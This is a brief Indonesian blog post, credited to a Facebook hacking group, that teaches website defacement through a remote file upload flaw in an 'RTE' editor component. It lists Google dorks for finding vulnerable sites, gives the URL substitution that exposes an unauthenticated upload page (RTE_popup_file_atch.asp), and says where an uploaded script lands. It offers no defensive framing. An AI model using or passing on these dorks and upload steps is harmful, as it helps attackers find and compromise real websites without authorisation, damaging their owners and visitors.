Selasa, 16 Agustus 2016

Simple Deface with RTE Remote File Upload Vulnerability

LAngsung ajah ke topic :) 

Simple Deface with RTE Remote File Upload Vulnerability (Budi 1337Cyberindo)#justshare

Dork :
inurl:rte/my_documents/my_files
inurl:/my_documents/my_files/
Exploit:
Ganti URL "rte/my_documents/my_files"
dengan
"/rte/RTE_popup_file_atch.asp"
contoh:
http://www.samplee .com/admin/useradmin/rte/my_documents/my_files/
Setelah di exploit :
http://www.samplee .com/admin/useradmin/rte/RTE_popup_file_atch.asp
Setelah upload , path nya kira kira disini :
http://www.samplee.com/admin/useradmin/rte/my_documents/my_files/yourscript.html

Sekian dan makasih

Source: 1337CyberIndo Facebook

0 komentar:

sealkazzsoftware.blogspot.com resepkuekeringku.com

Posting Komentar